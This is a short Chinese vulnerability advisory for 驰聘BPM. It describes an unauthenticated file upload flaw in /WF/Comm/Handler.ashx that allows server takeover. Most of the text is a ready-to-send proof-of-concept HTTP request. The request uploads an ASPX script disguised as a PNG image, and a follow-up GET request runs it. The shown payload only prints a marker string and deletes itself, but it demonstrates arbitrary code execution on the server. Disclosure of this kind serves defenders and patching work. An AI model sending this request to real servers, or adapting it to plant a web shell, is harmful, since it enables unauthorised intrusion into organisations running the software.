漏洞描述
驰聘BPM /WF/Comm/Handler.ashx 存在未授权文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。
驰聘BPM /WF/Comm/Handler.ashx 文件上传漏洞
PoC代码
POST /WF/Comm/Handler.ashx?DoType=HttpHandler&DoMethod=RichUploadFile&HttpHandlerName=BP.WF.HttpHandler.WF_Comm_Sys&Directory=Mazi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 367
Content-Type: multipart/form-data; boundary=b2237e8d2568d8ea2d2d05cb81dfa346
--b2237e8d2568d8ea2d2d05cb81dfa346
Content-Disposition: form-data; name="edit"; filename="5e4abc9e0d.aspx"
Content-Type: image/png
<%
Response.Write("56bc58c67eb59a4f50078753100e7f69")
CreateObject("Scripting.FileSystemObject").DeleteFile(server.mappath(Request.ServerVariables("SCRIPT_NAME")))
%>
--b2237e8d2568d8ea2d2d05cb81dfa346--
GET /DataUser/RichTextFile/Mazi/5e4abc9e0d.aspx HTTP/1.1